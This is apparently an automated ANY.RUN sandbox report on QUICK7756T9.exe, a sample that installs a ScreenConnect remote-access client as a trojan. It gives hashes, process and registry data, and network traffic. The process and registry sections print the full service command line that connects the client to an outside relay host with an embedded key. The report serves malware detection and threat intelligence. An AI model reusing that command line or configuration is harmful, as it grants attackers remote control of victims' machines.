File name:

QUICK7756T9.exe

Full analysis: https://app.any.run/tasks/e1517ae5-8fc7-41d4-989d-748bd835a0fb
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 15, 2025, 18:43:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
connectwise
rmm-tool
screenconnect
remote
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

B638D19EBB8E5EBB6278D7F745A66D38

SHA1:

1566F51FA759976E4B35932E359D22C73725286A

SHA256:

71BE5157289D7F711BD9043248DEB3978E575D5D32BAE4DBFC82618D765E8596

SSDEEP:

98304:RahxA3yFBPR3ipsn6lev+KNCOytH9awXB0DXe3S+5OmxlGwP3AW5JTGG0DR/WziA:cwDAYqhtu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 2600)
  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 2600)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 2600)
    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 2600)
    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.ClientService.exe (PID: 2600)
    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.ClientService.exe (PID: 2600)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 20:10:20+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 45568
InitializedDataSize: 5500928
UninitializedDataSize: -
EntryPoint: 0x14ad
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
162
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
#SCREENCONNECT screenconnect.clientservice.exe quick7756t9.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2600"C:\Program Files (x86)\ScreenConnect Client (80ef3e19478fcac4)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=knto3j.anondns.net&p=8041&s=12a9d364-2173-4db0-96c1-4ffcd9dd0fb3&k=BgIAAACkAABSU0ExAAgAAAEAAQB9gl6OsLPapBFW7XbVeS8mXj6AMjCHdNex%2f9sG7l2n9IFWQHbMiU%2b9vQVhr6cyOx40H%2fsokEoFHddDo7V1%2f7gZ01kqBbDMFN0g%2b6eywSWHdaZ1KhPV%2bxpFeKJf4dnoRJmM3ceTp%2bX8YvAeWZB0rC8lDTTZUzZCMDijgs22I5NPMj8fjlUF61MW2NiVioUWMOPCJJ0hEVFAvtVrrUGAqHMM5OllVmOIlJJ9CF9elycwHyvSKNJDwGZoyCWaAgplEAYWQ5KgQw3LqOXDooFLzyVLTzoTdBWPXmrYrO%2fg9WGjoehoMcVSk6uVcKcoT8uFmxCC51NIq8w3OZewu5bfB4%2by&c=QuickBook&c=&c=&c=update&c=&c=&c=&c="C:\Program Files (x86)\ScreenConnect Client (80ef3e19478fcac4)\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
25.2.4.9229
Modules
Images
c:\program files (x86)\screenconnect client (80ef3e19478fcac4)\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
7172"C:\Users\admin\Desktop\QUICK7756T9.exe" C:\Users\admin\Desktop\QUICK7756T9.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\quick7756t9.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events
1 523
Read events
1 521
Write events
2
Delete events
0

Modification events

(PID) Process:(2600) ScreenConnect.ClientService.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (80ef3e19478fcac4)
Operation:writeName:ImagePath
Value:
"C:\Program Files (x86)\ScreenConnect Client (80ef3e19478fcac4)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=knto3j.anondns.net&p=8041&s=12a9d364-2173-4db0-96c1-4ffcd9dd0fb3&k=BgIAAACkAABSU0ExAAgAAAEAAQB9gl6OsLPapBFW7XbVeS8mXj6AMjCHdNex%2f9sG7l2n9IFWQHbMiU%2b9vQVhr6cyOx40H%2fsokEoFHddDo7V1%2f7gZ01kqBbDMFN0g%2b6eywSWHdaZ1KhPV%2bxpFeKJf4dnoRJmM3ceTp%2bX8YvAeWZB0rC8lDTTZUzZCMDijgs22I5NPMj8fjlUF61MW2NiVioUWMOPCJJ0hEVFAvtVrrUGAqHMM5OllVmOIlJJ9CF9elycwHyvSKNJDwGZoyCWaAgplEAYWQ5KgQw3LqOXDooFLzyVLTzoTdBWPXmrYrO%2fg9WGjoehoMcVSk6uVcKcoT8uFmxCC51NIq8w3OZewu5bfB4%2by&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAuY9AORA3cUSoBSqZnjibSgAAAAACAAAAAAAQZgAAAAEAACAAAAAQ0kTTSCisoMk0FKlMimXdWsugURfye216dGg11esUlgAAAAAOgAAAAAIAACAAAABtx88BfDYQ9f3QhArfBZ%2bb4mdrUISKAbsBnxJPy7UDQ6AEAAB1A%2ba%2bZHB66CcI5mzeaQ0q0WM7FdiuVvatc5u%2fBw3PYk7ZmHTWYmZXKHAfNh0TjqlMi4rtuMpEAZDNc9gbLpSm%2bHbUM5qSZ4pJpj0qYApHrdFMfJCmBqbuw5iVmkTpw1kHApiySavkQJRBm5v3AZBy9RmoGnJsHRhPACKZrs18KuO7avd22tBxP8CPr%2fMANirHVSNjWP19RSUd70GwCueIJy2l18MBhGhisZ3%2fRf9yQaGT3WeRWcxiAi6ywLsj%2b4CK6Up3AUdP9XPifbEj4qbJi2rna%2fRuZlcOcrkiuEdpSkuyQ9zS0O8fO%2bVCnCcsbob5KgnvJH%2fLNwnzMAMEppMb2FchsH1c4RngYivsyy9OTiYi1tcixC1WfpsGoodUdLPxPUHlH006NLXZtHZ1rX9%2f1V%2fFg2Wz0BRijM%2fPwxGeyHSKJ%2f%2blvTXE7AwzSeQFJIvIFfuQ%2bb%2buPZtHAbElfejw6rj6UpReBGB1mRIIMyFdD3pQVNHtypQNZgCYldtN1N7Pjr2w1ULjqgLqDYUK36FS2Om3XWe3F4mPHApYoGSs9yTF5%2fPJT3A1R1mNVz1qjjysSuzRdnRfPvyxYZf3DBoWf6qfFFEaT1DPPAOKxchNqF50jwsjVsZXs7IyFe4OCHDDnJePAXNT7g1eZxEXQTE%2fO9vTngsXCN3iG0BwgbMpIWY4gC7Kno3hLir%2fpt5iUWtBXSE7zgnaj0MDpjJLyiKpDXpKB19g5WpBJWq1PHrFkUxcZjiJf%2fBM1sDmi%2b81iPvSJDoKWTrP0FXHxI33m8HI3RgkJCzPQAe91ErRYRjA37ywpALgSCAuoXfVQ%2bGdWgfAoEK09DBvBCy9HGwIngKby2epHnf%2fnSFC3IUTTJDxVdAF32qGb2Ud%2fKMa4W6T80WZcdlHqNn9C5f%2bwMAkb55JECD5f93oRp3PWmkqcJvcesEvmk%2fmtZhuxZP%2brjCEByQATvFIkwVSYp2ERNA2lAEdAVVs3zs%2fcP%2fJoWsN5A4xI%2bEbKNXJ6lIWeSz2jrlugWSfJJ%2bysQaMD3plTlBuYfr9cRMYalFVk3JoAEGFdfI5JVPpXj2UPYG%2fqvZp3MSWv8lRP%2bMNi4PGi%2f78QNKPhmTXe3hQJGND%2fZMNsz7pqjsFWZYmOc3GKxV%2bhAUmeFKCUi7gQ%2fYqpdITmmjCDiexe%2fL%2bwGTSdTKb63EcMV9LrEbGbo%2faVzWbIuX8zi49kdGN48Pr0JkjmRkShNrW4PMLgQJuaOcyeKbvpDe%2bvEQxQfTTZJ5cqBbiHNONx2k00Ws06pHL8TlsoGdVAm%2f4y7Q4LEhhqV%2bJRAGv3axVsLbYEP9ZowpLuNbU5IfT%2fThG%2fkP2U5zNfYJ6HC20TqKLaxRvWtopFL87DpvMnvhc%2bAczLGDEMTUAzbuia6%2b1p5oqCy%2f%2baxeSWZUJAaA0TYY9Tl4JE8ziNTwoxCnXSftodLcI5o9PdYnPr9UebHfRa9hZ8h%2bNZGdpRW5tqBjxo2A18ll3HE3nt5eX7tdVF6W6vyG9IpgyTaGkM8YH58OZtBg2z8DMIEfjcg1P9h6eFgLfe0j2UpUGVxxJ6Jyku47CC3Al8iLDe0AAAABwT1atHa94Me2SKiSaP%2fQqP7qzhFiU4tduEoib70IgEK6h0l0OZxUCrP9YTeeKmjVr%2fkbABhTIVWuh5mOB1FMs&c=QuickBook&c=&c=&c=update&c=&c=&c=&c="
(PID) Process:(2600) ScreenConnect.ClientService.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
Operation:writeName:EventMessageFile
Value:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EventLogMessages.dll
Executable files
0
Suspicious files
0
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2600ScreenConnect.ClientService.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (80ef3e19478fcac4)\user.configxml
MD5:5511014AAD582C57FF41F81E7DDB6AB7
SHA256:4C6A2CA37257AD4B77300B29B513EC55E3A3997C3FD4DA53C8C277D67D76A1B8
2600ScreenConnect.ClientService.exeC:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (80ef3e19478fcac4)\5h2qc51g.newcfgxml
MD5:5511014AAD582C57FF41F81E7DDB6AB7
SHA256:4C6A2CA37257AD4B77300B29B513EC55E3A3997C3FD4DA53C8C277D67D76A1B8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
47
DNS requests
20
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2104
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.191:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2096
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2096
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.48.23.191:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
40.126.31.1:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.191
  • 23.48.23.180
  • 23.48.23.141
  • 23.48.23.166
  • 23.48.23.140
  • 23.48.23.176
  • 23.48.23.138
  • 23.48.23.193
  • 23.48.23.194
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.1
  • 20.190.159.131
  • 20.190.159.68
  • 40.126.31.3
  • 20.190.159.71
  • 20.190.159.73
  • 40.126.31.67
  • 20.190.159.128
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
go.microsoft.com
  • 2.19.106.8
  • 95.100.186.9
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
2600
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info